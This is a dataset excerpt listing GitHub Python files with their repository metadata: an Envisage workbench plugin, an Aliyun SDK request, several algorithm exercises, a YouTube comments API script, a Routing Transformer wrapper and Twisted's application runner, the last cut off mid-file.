blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
293ff497bc9c02162313472b028ec2ddb6e186bc | dd7dc458691dcff1b2493c927acd62695c2187c4 | /lib/python2.7/site-packages/envisage/ui/workbench/workbench_plugin.py | 224c2068f00fc03f60552f917b2f9ce3c91fd991 | [] | no_license | stephenosullivan/science | 16e0c7fb441af29810cad630e6187961ad57398e | 164e82df0655337ac4966273d9cc489d002d8987 | refs/heads/master | 2021-03-27T09:52:05.330679 | 2015-07-25T04:51:25 | 2015-07-25T04:51:25 | 39,672,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,048 | py | """ The Envisage workbench plugin. """
# Enthought library imports.
from envisage.api import ExtensionPoint, Plugin, ServiceOffer
from traits.api import Callable, List
# This module's package.
PKG = '.'.join(__name__.split('.')[:-1])
class WorkbenchPlugin(Plugin):
""" The Envisage workbench plugin.
The workbench plugin uses the PyFace workbench to provide the basis of an
IDE-like user interface. The interface is made up of perspectives, views
and editors.
Note that this is not intended to be a 'general-purpose' plugin for user
interfaces - it provides an IDE-like style and that is all. If your
application requires another style of interface then write another plugin
(you can still re-use all the menu, group and action contribution stuff!).
"""
# The Ids of the extension points that this plugin offers.
ACTION_SETS = PKG + '.action_sets'
PERSPECTIVES = PKG + '.perspectives'
PREFERENCES_PAGES = PKG + '.preferences_pages'
WORKBENCH_SERVICE_OFFERS = PKG + '.service_offers'
VIEWS = PKG + '.views'
# The Ids of the extension points that this plugin contributes to.
PREFERENCES = 'envisage.preferences'
SERVICE_OFFERS = 'envisage.service_offers'
#### 'IPlugin' interface ##################################################
# The plugin's unique identifier.
id = 'envisage.ui.workbench'
# The plugin's name (suitable for displaying to the user).
name = 'Workbench'
#### Extension points offered by this plugin ##############################
action_sets = ExtensionPoint(
List(Callable), id=ACTION_SETS, desc="""
An action set contains the toobars, menus, groups and actions that you
would like to add to top-level workbench windows (i.e. the main
application window). You can create new toolbars, menus and groups
and/or add to existing ones.
Each contribution to this extension point must be a factory that
creates an action set, where 'factory' means any callable with the
following signature::
callable(**traits) -> IActionSet
The easiest way to contribute such a factory is to create a class
that derives from 'envisage.ui.action.api.ActionSet'.
"""
)
perspectives = ExtensionPoint(
List(Callable), id=PERSPECTIVES, desc="""
A perspective is simply an arrangment of views around the (optionally
hidden) editor area.
Each contribution to this extension point must be a factory that
creates a perspective, where 'factory' means any callable with the
following signature::
callable(**traits) -> IPerspective
The easiest way to contribute such a factory is to create a class
that derives from 'pyface.workbench.api.IPerspective'.
"""
)
preferences_pages = ExtensionPoint(
List(Callable), id=PREFERENCES_PAGES, desc="""
A preferences page appears in the preferences dialog to allow the user
to manipulate some preference values.
Each contribution to this extension point must be a factory that
creates a preferences page, where 'factory' means any callable with the
following signature::
callable(**traits) -> IPreferencesPage
The easiest way to contribute such a factory is to create a class
that derives from 'apptools.preferences.ui.api.IPreferencesPage'.
"""
)
service_offers = ExtensionPoint(
List(ServiceOffer),
id = WORKBENCH_SERVICE_OFFERS,
desc = """
Services are simply objects that a plugin wants to make available to
other plugins. This extension point allows you to offer 'per
window' services that are created 'on-demand' (where 'on demand' means
the first time somebody looks up a service of the appropriate
protocol).
.
e.g.
my_service_offer = ServiceOffer(
protocol = 'acme.IMyService',
factory = an_object_or_a_callable_that_creates_one,
properties = {'a dictionary' : 'that is passed to the factory'}
)
Any properties specified are passed as keywrod arguments to the
factory, i.e. the factory signature is::
callable(**properties)
"""
)
views = ExtensionPoint(
List(Callable), id=VIEWS, desc="""
A view provides information to the user to support their current
task. Views can contain anything you like(!) and are arranged around
the (optionally hidden) editor area. The user can re-arrange views as
he/she sees fit.
Each contribution to this extension point must be a factory that
creates a view, where 'factory' means any callable with the following
signature::
callable(**traits) -> IView
The easiest way to contribute such a factory is to create a class
that derives from 'pyface.workbench.api.View'.
It is also common to use a simple function (especially when a view
is a representation of a service) e.g::
def foo_view_factory(**traits):
' Create a view that is a representation of a service. '
foo = self.application.get_service('IFoo')
return FooView(foo=foo, **traits)
"""
)
#### Contributions to extension points made by this plugin ################
my_action_sets = List(contributes_to=ACTION_SETS)
def _my_action_sets_default(self):
""" Trait initializer. """
from default_action_set import DefaultActionSet
return [DefaultActionSet]
my_preferences = List(contributes_to=PREFERENCES)
def _my_preferences_default(self):
""" Trait initializer. """
return ['pkgfile://envisage.ui.workbench/preferences.ini']
my_preferences_pages = List(contributes_to=PREFERENCES_PAGES)
def _my_preferences_pages_default(self):
""" Trait initializer. """
from workbench_preferences_page import WorkbenchPreferencesPage
return [WorkbenchPreferencesPage]
my_service_offers = List(contributes_to=SERVICE_OFFERS)
def _my_service_offers_default(self):
""" Trait initializer. """
preferences_manager_service_offer = ServiceOffer(
protocol = 'apptools.preferences.ui.preferences_manager'
'.PreferencesManager',
factory = self._create_preferences_manager_service
)
workbench_service_offer = ServiceOffer(
protocol = 'envisage.ui.workbench.workbench.Workbench',
factory = self._create_workbench_service
)
return [preferences_manager_service_offer, workbench_service_offer]
###########################################################################
# Private interface.
###########################################################################
def _create_preferences_manager_service(self, **properties):
""" Factory method for the preferences manager service. """
from apptools.preferences.ui.api import PreferencesManager
preferences_manager = PreferencesManager(
pages=[factory() for factory in self.preferences_pages]
)
return preferences_manager
def _create_workbench_service(self, **properties):
""" Factory method for the workbench service. """
# We don't actually create the workbench here, we just return a
# reference to it.
#
# fixme: This guard is really just for testing when we have the
# workbench plugin as a source egg (i.e. if the egg is on our path
# then we get the plugin for any egg-based application, even if it is
# not a workbench application!).
return getattr(self.application, 'workbench', None)
### EOF ######################################################################
| [
"[email protected]"
] | |
995f17f49f0cc20090ed4da3fc31fdabd4c2e5df | 6a61ef12621c8a917d160db62415487fe2c469f7 | /aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/DeleteJobGroupRequest.py | 6edfb7caf350c296ba47360d1600bde52a8e0e09 | [
"Apache-2.0"
] | permissive | zhangwp-cn/aliyun-openapi-python-sdk | f0b15369665a956490534c942676ed15410196f7 | a560e38f97351db05d13f0588f7bdfb4292ed3ae | refs/heads/master | 2022-09-08T13:31:26.842867 | 2020-06-04T03:23:30 | 2020-06-04T03:23:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,607 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkoutboundbot.endpoint import endpoint_data
class DeleteJobGroupRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'OutboundBot', '2019-12-26', 'DeleteJobGroup','outboundbot')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_JobGroupId(self):
return self.get_query_params().get('JobGroupId')
def set_JobGroupId(self,JobGroupId):
self.add_query_param('JobGroupId',JobGroupId) | [
"[email protected]"
] | |
0b4681cbbbd15b1ae82f979dfb0855a484f541fc | 8e3b452b08139f25be824fae2b8b7aabb158d888 | /6.00.1.x/Week3/Lecture5/lectureCode_Lec5-towers.py | 13861370c38b6bf6a8bbf93b0af680633678f9d6 | [] | no_license | prasannabe2004/MITx | d38a11e38a0abb73ffa37dccb363f779011155ab | 1954b5fc31004c94f46fc8194b7fa773108c4493 | refs/heads/master | 2020-05-16T19:14:00.963550 | 2015-08-07T18:50:12 | 2015-08-07T18:50:12 | 25,537,861 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | def printMove(fr, to):
print('move from ' + str(fr) + ' to ' + str(to))
def Towers(n, fr, to, spare):
if n == 1:
printMove(fr, to)
else:
Towers(n-1, fr, spare, to)
Towers(1, fr, to, spare)
Towers(n-1, spare, to, fr)
Towers(5, 'f','t','s') | [
"[email protected]"
] | |
2e9e653a3ba5f6b2d39e8bc2a9b81531627f0d53 | be5c86e8fe3f5836b7d2097dd5272c72b5b28f15 | /binary-search/Python/0069-sqrtx(调试代码).py | 34fb4dc1e8fd789b231dfc3dc042a189448bc516 | [
"Apache-2.0"
] | permissive | lemonnader/LeetCode-Solution-Well-Formed | d24674898ceb5441c036016dc30afc58e4a1247a | baabdb1990fd49ab82a712e121f49c4f68b29459 | refs/heads/master | 2021-04-23T18:49:40.337569 | 2020-03-24T04:50:27 | 2020-03-24T04:50:27 | 249,972,064 | 1 | 0 | Apache-2.0 | 2020-03-25T12:26:25 | 2020-03-25T12:26:24 | null | UTF-8 | Python | false | false | 1,303 | py | class Solution:
def mySqrt(self, x: int) -> int:
if x == 0:
return 0
left = 1
right = x // 2
while left < right:
# 调试代码开始:为了仔细观察区间左右端点,我们每进入一次循环,让线程休眠 1 秒
import time
time.sleep(1)
print('调试代码,观察区间左右端点、中位数,和进入的分支: left = {} , right = {} , '.format(left, right), end='')
# 调试代码结束
# 错误代码,在分支左区间不发生收缩的情况下,中位数应该取右中位数
# mid = left + (right - left) // 2
mid = (left + right) >> 1
# 调试代码
print('mid = {} ,'.format(mid), end=' ')
square = mid * mid
if square > x:
# 调试代码
print('进入 right = mid - 1 这个分支。')
right = mid - 1
else:
# 调试代码
print('进入 left = mid 这个分支。')
left = mid
return left
if __name__ == '__main__':
# 当 x = 8 的时候,代码能得出正确答案
x = 9
solution = Solution()
res = solution.mySqrt(x)
print(res)
| [
"[email protected]"
] | |
21e37b4f7a6e38423629ff7f88949c775997a74a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02536/s375378291.py | 93ecd40e03e6ad422973faf79ca95508b26c6569 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | import sys
sys.setrecursionlimit(10 ** 9)
class UnionFind():
def __init__(self, n):
self.n = n
self.root = [-1]*(n+1)
self.rank = [0]*(n+1)
def find(self, x):#親となる要素を探索
if self.root[x] < 0:
return x
else:
self.root[x] = self.find(self.root[x])#再帰
return self.root[x]
def unite(self, x, y):
x = self.find(x)
y = self.find(y)
if x == y:
return
elif self.rank[x] > self.rank[y]:#深い木に連結
self.root[x] += self.root[y]
self.root[y] = x#yの親をxとする
else:
self.root[y] += self.root[x]
self.root[x] = y
if self.rank[x] == self.rank[y]:
self.rank[y] += 1
def issame(self, x, y):#x, yが同じ集合か判定
return self.find(x) == self.find(y)
def count(self, x):#要素の個数
return (-1)*self.root[self.find(x)]
n, m = map(int, input().split())
uf = UnionFind(n)
for i in range(m):
a, b = map(int, input().split())
uf.unite(a-1, b-1)
ans = set()
for i in range(n):
ans.add(uf.find(i))
print(len(ans)-1) | [
"[email protected]"
] | |
e1508f8201b4113f896bf0ace8208bf541a2431b | de4d88db6ea32d20020c169f734edd4b95c3092d | /aiotdlib/api/types/sponsored_message.py | d0baa01e34edffdfdd0b1242e871c3ddd8921c86 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | thiagosm/aiotdlib | 5cc790a5645f7e4cc61bbd0791433ed182d69062 | 4528fcfca7c5c69b54a878ce6ce60e934a2dcc73 | refs/heads/main | 2023-08-15T05:16:28.436803 | 2021-10-18T20:41:27 | 2021-10-18T20:41:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,493 | py | # =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
import typing
from pydantic import Field
from .internal_link_type import InternalLinkType
from .message_content import MessageContent
from ..base_object import BaseObject
class SponsoredMessage(BaseObject):
"""
Describes a sponsored message
:param id: Unique sponsored message identifier
:type id: :class:`int`
:param sponsor_chat_id: Chat identifier
:type sponsor_chat_id: :class:`int`
:param link: An internal link to be opened when the sponsored message is clicked; may be null. If null, the sponsor chat needs to be opened instead, defaults to None
:type link: :class:`InternalLinkType`, optional
:param content: Content of the message
:type content: :class:`MessageContent`
"""
ID: str = Field("sponsoredMessage", alias="@type")
id: int
sponsor_chat_id: int
link: typing.Optional[InternalLinkType] = None
content: MessageContent
@staticmethod
def read(q: dict) -> SponsoredMessage:
return SponsoredMessage.construct(**q)
| [
"[email protected]"
] | |
af66f3e9667cc2d7a9aca8543be26bbdbeffb849 | af9c0aafa10b7901533de0b32177ab80b4782d3f | /notes/code/youtube/comments_one_video.py | 0ae8f2715bd2cd2765d7e2162e6561247db18f41 | [
"MIT"
] | permissive | Akramz/msds692 | d1d33298b7599950e95838c0fc9ddbd47a98ed5b | 42f4c2a0dc7569152bac2439e9b6385f2f101f7b | refs/heads/master | 2023-01-25T00:44:11.197544 | 2020-12-05T22:05:14 | 2020-12-05T22:05:14 | 319,362,758 | 1 | 0 | MIT | 2020-12-07T15:31:12 | 2020-12-07T15:31:11 | null | UTF-8 | Python | false | false | 708 | py | import sys
from googleapiclient.discovery import build
DEVELOPER_KEY = sys.argv[1]
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
video_id = "gU_gYzwTbYQ" # bonkers the cat
# code from https://developers.google.com/youtube/v3/docs/comments/list
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)
results = youtube.commentThreads().list(
part="snippet",
videoId=video_id,
textFormat="plainText"
).execute()
for item in results["items"]:
comment = item["snippet"]["topLevelComment"]
author = comment["snippet"]["authorDisplayName"]
text = comment["snippet"]["textDisplay"]
print("Comment by %s: %s" % (author, text))
| [
"[email protected]"
] | |
1b14e0893000f94e90a7478eb66d700400cb0141 | 7882860350c714e6c08368288dab721288b8d9db | /1일차/if(8번문제).py | 9db67865be7d0871db81bafb600eeaa1d088a3f2 | [] | no_license | park-seonju/Algorithm | 682fca984813a54b92a3f2ab174e4f05a95921a8 | 30e5bcb756e9388693624e8880e57bc92bfda969 | refs/heads/master | 2023-08-11T18:23:49.644259 | 2021-09-27T10:07:49 | 2021-09-27T10:07:49 | 388,741,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | result=[]
for i in range(100,301):
a=int(i/100) # int로 해야함
b=int(i/10)
if(a % 2 == 0 and b % 2 == 0 and i % 2 == 0):
result.append(str(i))
print(",".join(result))
| [
"[email protected]"
] | |
76283425866e43198277a6f4f43dcc74ae590214 | e1009433697344f0ce6ec953f086be698fa4e6c4 | /parsmodel.py | 10d1dbeb9a2e033a4397f7c7bf345fec03e56af2 | [] | no_license | bladas/online-store | 7e848bad1137cf7886cec6bf7563867e5f8f5e36 | 6fd68e0d1318b796b05a94fa5547d5e87a2b0172 | refs/heads/master | 2023-05-02T07:11:55.614313 | 2020-01-06T14:20:19 | 2020-01-06T14:20:19 | 216,340,778 | 0 | 0 | null | 2023-04-21T20:38:49 | 2019-10-20T10:00:46 | Python | UTF-8 | Python | false | false | 2,339 | py | import json
from home.models import Category, UnderCategory, Product
def create(json, Category, UnderCategory, Product):
with open('citrus.json', 'r') as json_file:
data = json.load(json_file)
for elem in data:
print(elem.get('name'))
print(elem.get('category'))
print(elem.get('undercategory'))
print(elem.get('price'))
# new_category = Category.objects.create(title=elem.get('category'))
# new_uc = UnderCategory.objects.create(title=elem.get('undercategory'), category=new_category)
# new_product = Product.objects.create(name=elem.get('name'), ucategory=new_uc)
# new_category.save()
# new_uc.save()
# new_product = Product.objects.create(name=elem.get('name'), ucategory=new_uc)
try:
category = Category.objects.get(title=elem.get('category'))
try:
ucategory = UnderCategory.objects.get(title=elem.get('undercategory'), category=category)
new_product = Product.objects.create(name=elem.get('name'), ucategory=ucategory,
price=elem.get('price'))
new_product.save()
except:
new_uc = UnderCategory.objects.create(title=elem.get('undercategory'), category=new_category)
new_uc.save()
new_product = Product.objects.create(name=elem.get('name'), ucategory=new_uc,
price=elem.get('price'))
new_product.save()
except:
new_category = Category.objects.create(title=elem.get('category'))
new_category.save()
try:
print(UnderCategory.objects.get(title=elem.get('undercategory'), category=new_category))
except:
new_uc = UnderCategory.objects.create(title=elem.get('undercategory'), category=new_category)
new_uc.save()
new_product = Product.objects.create(name=elem.get('name'), ucategory=new_uc,price=elem.get('price'))
new_product.save()
# print(create())
create(json, Category, UnderCategory, Product)
| [
"[email protected]"
] | |
56d37d047190975695cb0168c225c11656be6066 | d94b6845aeeb412aac6850b70e22628bc84d1d6d | /routing_transformer/routing_tf_api.py | ddc35172d2adda48e5cb8cb0ef32aaa4146d4629 | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 7,727 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pdb
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
tf.get_logger().setLevel('ERROR')
from tensor2tensor import models
from tensor2tensor import problems
from tensor2tensor.utils import trainer_lib
from tensor2tensor.utils import hparams_lib
from tensor2tensor.utils import registry
from tensor2tensor.utils import metrics
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.data_generators import problem
from routing_transformer.problems import pg19
from tensorflow.compat.v1 import estimator as tf_estimator
from tqdm import tqdm
from routing_transformer.sparse_transformer import SparseTransformer
import numpy as np
import random
from scipy.special import log_softmax
VOCAB_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-data/vocab.pg19_length8k.32768.subwords"
HPARAMS_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-models/rt-checkpoint/hparams.json"
CKPT_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-models/rt-checkpoint/ckpt-3530000"
MAX_SEQUENCE_LENGTH = 8192
class SparseTransformerWrapper(object):
def __init__(self, max_seq_length=None):
# Load hyperparameters
self.max_seq_length = max_seq_length or MAX_SEQUENCE_LENGTH
# Needed since RT uses blocks of size 256
assert self.max_seq_length % 256 == 0
hparams = hparams_lib.create_hparams_from_json(HPARAMS_PATH)
hparams.use_tpu = False
hparams = zero_dropout(hparams)
# Build TF1 graph of model
sptf_model = SparseTransformer(hparams, tf_estimator.ModeKeys.EVAL)
self.input_nodes = {
"targets": tf.placeholder(tf.int32, [None, self.max_seq_length])
}
self.output_nodes = sptf_model.body(self.input_nodes)
# Map the checkpoint variables to the graph
init_from_checkpoint(CKPT_PATH, variable_prefix="sparse_transformer/body")
# create a session object, and actually initialize the graph
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.encoder = text_encoder.SubwordTextEncoder(VOCAB_PATH)
def forward(self, sentences, encode_sentences=True, relevant_subsequences=None):
encoded_sents = []
encoded_seqs_no_pad = []
if encode_sentences:
for sent in sentences:
encoded = []
for line in sent.split("\n"):
new_tokens = self.encoder.encode(line.strip())
if len(encoded) + len(new_tokens) >= self.max_seq_length:
break
encoded.extend(new_tokens)
encoded.append(text_encoder.EOS_ID)
encoded_seqs_no_pad.append(encoded)
# pad shorter sequences to the full length
encoded = encoded + [text_encoder.PAD_ID for _ in range(self.max_seq_length - len(encoded))]
assert len(encoded) == self.max_seq_length
encoded_sents.append(encoded)
else:
# assume sentences are encoded, pad/truncate them
for sent in sentences:
sent = sent[:self.max_seq_length]
encoded_seqs_no_pad.append(sent)
sent = sent + [text_encoder.PAD_ID for _ in range(self.max_seq_length - len(sent))]
encoded_sents.append(sent)
feed_dict = {
self.input_nodes["targets"]: np.array(encoded_sents)
}
outputs = self.sess.run(self.output_nodes, feed_dict=feed_dict)
return_outputs = {
"logits": np.squeeze(outputs[0], axis=(2, 3)),
"loss": outputs[1]["training"],
"encoded_seqs_no_pad": encoded_seqs_no_pad
}
if relevant_subsequences is not None:
for i, rss in enumerate(relevant_subsequences):
encoded_subseq = self.encoder.encode(rss)
positions = find_sub_list(encoded_subseq, encoded_sents[i])
misaligned_prefix_length = 0
while positions is None:
misaligned_prefix_length += 1
encoded_subseq = encoded_subseq[1:]
positions = find_sub_list(encoded_subseq, encoded_sents[i])
start, end = positions[-1]
relevant_logits = return_outputs["logits"][i][start:end]
log_probs = log_softmax(relevant_logits, axis=1)
gold_log_probs = [lp[index] for index, lp in zip(encoded_subseq, log_probs)]
return_outputs["subseq_log_loss"] = -1 * np.mean(gold_log_probs)
return_outputs["misaligned_prefix_length"] = misaligned_prefix_length
return return_outputs
def close(self):
self.sess.close()
def find_sub_list(sl, l):
"""Find sub-string, so as to be able to compute ppl of a sub-string."""
sll=len(sl)
matches = []
for ind in (i for i,e in enumerate(l) if e == sl[0]):
if l[ind:ind + sll] == sl:
matches.append(
(ind, ind + sll)
)
if matches:
return matches
def zero_dropout(hparams):
hparams.input_dropout = 0.0
hparams.dropout = 0.0
hparams.relu_dropout = 0.0
hparams.attention_dropout = 0.0
hparams.layer_prepostprocess_dropout = 0.0
return hparams
def log_variables(name, var_names):
tf.logging.info("%s (%d total): %s", name, len(var_names),
random.sample(var_names, min(len(var_names), 5)))
def init_from_checkpoint(checkpoint_path,
checkpoint_prefix=None,
variable_prefix=None,
target_variables=None):
"""Initializes all of the variables using `init_checkpoint."""
tf.logging.info("Loading variables from %s", checkpoint_path)
checkpoint_variables = {
name: name for name, _ in tf.train.list_variables(checkpoint_path) if "Adafactor" not in name
}
if target_variables is None:
target_variables = tf.trainable_variables()
target_variables = {var.name.split(":")[0]: var for var in target_variables}
if checkpoint_prefix is not None:
checkpoint_variables = {
checkpoint_prefix + "/" + name: varname
for name, varname in checkpoint_variables.items()
}
if variable_prefix is not None:
target_variables = {
variable_prefix + "/" + name: var
for name, var in target_variables.items()
}
checkpoint_var_names = set(checkpoint_variables.keys())
target_var_names = set(target_variables.keys())
intersected_var_names = target_var_names & checkpoint_var_names
assignment_map = {
checkpoint_variables[name]: target_variables[name]
for name in intersected_var_names
}
tf.train.init_from_checkpoint(checkpoint_path, assignment_map)
log_variables("Loaded variables", intersected_var_names)
log_variables("Uninitialized variables", target_var_names - checkpoint_var_names)
log_variables("Unused variables", checkpoint_var_names - target_var_names)
| [
"[email protected]"
] | |
6ecd7aef7feeaf0c0a1b5b863f5a9956e43c4838 | 99094cc79bdbb69bb24516e473f17b385847cb3a | /58.Length of Last Word/Solution.py | 6a986db084927025fd5e816d63158989ce2edd7a | [] | no_license | simonxu14/LeetCode_Simon | 7d389bbfafd3906876a3f796195bb14db3a1aeb3 | 13f4595374f30b482c4da76e466037516ca3a420 | refs/heads/master | 2020-04-06T03:33:25.846686 | 2016-09-10T00:23:11 | 2016-09-10T00:23:11 | 40,810,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | __author__ = 'Simon'
class Solution(object):
def lengthOfLastWord(self, s):
"""
:type s: str
:rtype: int
"""
li = s.split()
if li:
return len(li[-1])
else:
return 0 | [
"[email protected]"
] | |
ff44601100038aba800c66cb8d18e73458d7b4df | bdf86d69efc1c5b21950c316ddd078ad8a2f2ec0 | /venv/Lib/site-packages/twisted/application/runner/_runner.py | 66f1f11ee0f27fe0b61e6dfa8b9fee0befdaa03b | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | DuaNoDo/PythonProject | 543e153553c58e7174031b910fd6451399afcc81 | 2c5c8aa89dda4dec2ff4ca7171189788bf8b5f2c | refs/heads/master | 2020-05-07T22:22:29.878944 | 2019-06-14T07:44:35 | 2019-06-14T07:44:35 | 180,941,166 | 1 | 1 | null | 2019-06-04T06:27:29 | 2019-04-12T06:05:42 | Python | UTF-8 | Python | false | false | 5,763 | py | # -*- test-case-name: twisted.application.runner.test.test_runner -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Twisted application runner.
"""
from os import kill
from signal import SIGTERM
from sys import stderr
from attr import attrib, attrs, Factory
from twisted.logger import (
globalLogBeginner, textFileLogObserver,
FilteringLogObserver, LogLevelFilterPredicate,
LogLevel, Logger,
)
from ._exit import exit, ExitStatus
from ._pidfile import nonePIDFile, AlreadyRunningError, InvalidPIDFileError
@attrs(frozen=True)
class Runner(object):
"""
Twisted application runner.
@cvar _log: The logger attached to this class.
@type _log: L{Logger}
@ivar _reactor: The reactor to start and run the application in.
@type _reactor: L{IReactorCore}
@ivar _pidFile: The file to store the running process ID in.
@type _pidFile: L{IPIDFile}
@ivar _kill: Whether this runner should kill an existing running
instance of the application.
@type _kill: L{bool}
@ivar _defaultLogLevel: The default log level to start the logging
system with.
@type _defaultLogLevel: L{constantly.NamedConstant} from L{LogLevel}
@ivar _logFile: A file stream to write logging output to.
@type _logFile: writable file-like object
@ivar _fileLogObserverFactory: A factory for the file log observer to
use when starting the logging system.
@type _pidFile: callable that takes a single writable file-like object
argument and returns a L{twisted.logger.FileLogObserver}
@ivar _whenRunning: Hook to call after the reactor is running;
this is where the application code that relies on the reactor gets
called.
@type _whenRunning: callable that takes the keyword arguments specified
by C{whenRunningArguments}
@ivar _whenRunningArguments: Keyword arguments to pass to
C{whenRunning} when it is called.
@type _whenRunningArguments: L{dict}
@ivar _reactorExited: Hook to call after the reactor exits.
@type _reactorExited: callable that takes the keyword arguments
specified by C{reactorExitedArguments}
@ivar _reactorExitedArguments: Keyword arguments to pass to
C{reactorExited} when it is called.
@type _reactorExitedArguments: L{dict}
"""
_log = Logger()
_reactor = attrib()
_pidFile = attrib(default=nonePIDFile)
_kill = attrib(default=False)
_defaultLogLevel = attrib(default=LogLevel.info)
_logFile = attrib(default=stderr)
_fileLogObserverFactory = attrib(default=textFileLogObserver)
_whenRunning = attrib(default=lambda **_: None)
_whenRunningArguments = attrib(default=Factory(dict))
_reactorExited = attrib(default=lambda **_: None)
_reactorExitedArguments = attrib(default=Factory(dict))
def run(self):
"""
Run this command.
"""
pidFile = self._pidFile
self.killIfRequested()
try:
with pidFile:
self.startLogging()
self.startReactor()
self.reactorExited()
except AlreadyRunningError:
exit(ExitStatus.EX_CONFIG, "Already running.")
return # When testing, patched exit doesn't exit
def killIfRequested(self):
"""
If C{self._kill} is true, attempt to kill a running instance of the
application.
"""
pidFile = self._pidFile
if self._kill:
if pidFile is nonePIDFile:
exit(ExitStatus.EX_USAGE, "No PID file specified.")
return # When testing, patched exit doesn't exit
try:
pid = pidFile.read()
except EnvironmentError:
exit(ExitStatus.EX_IOERR, "Unable to read PID file.")
return # When testing, patched exit doesn't exit
except InvalidPIDFileError:
exit(ExitStatus.EX_DATAERR, "Invalid PID file.")
return # When testing, patched exit doesn't exit
self.startLogging()
self._log.info("Terminating process: {pid}", pid=pid)
kill(pid, SIGTERM)
exit(ExitStatus.EX_OK)
return # When testing, patched exit doesn't exit
def startLogging(self):
"""
Start the L{twisted.logger} logging system.
"""
logFile = self._logFile
fileLogObserverFactory = self._fileLogObserverFactory
fileLogObserver = fileLogObserverFactory(logFile)
logLevelPredicate = LogLevelFilterPredicate(
defaultLogLevel=self._defaultLogLevel
)
filteringObserver = FilteringLogObserver(
fileLogObserver, [logLevelPredicate]
)
globalLogBeginner.beginLoggingTo([filteringObserver])
def startReactor(self):
"""
Register C{self._whenRunning} with the reactor so that it is called
once the reactor is running, then start the reactor.
"""
self._reactor.callWhenRunning(self.whenRunning)
self._log.info("Starting reactor...")
self._reactor.run()
def whenRunning(self):
"""
